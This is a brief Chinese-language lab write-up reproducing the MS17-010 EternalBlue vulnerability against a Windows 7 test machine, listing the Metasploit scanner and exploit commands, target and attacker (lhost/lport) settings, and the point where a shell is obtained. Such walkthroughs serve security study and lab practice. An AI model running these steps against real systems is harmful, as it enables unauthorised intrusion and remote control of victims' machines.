MS17-010漏洞復現

?攻擊機：192.168.148.132??kali linux2018.2 ?x64

靶機：192.168.1.129? ? win7 ? x64

首先用msfconsole的smb模塊掃描，看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.1.129 （目標主機）

?Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona

?

表示這個主機存在這個漏洞

?

1?search ?ms17_010 搜索這個漏洞

2???use exploit/windows/smb/ms17_010_eternalblue? ? ? ? ? ?

? ? ? ? ? ? ? ? ??利用這個漏洞

3?show options

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129 ?目標主機

rhost => 192.168.1.129

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻擊者主機

lhost => 192.168.1.132

msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 監聽端口 （這個可以隨意，但要大于2000，個人認為）

run??開始攻擊 這個表示拿shell成功了

?

?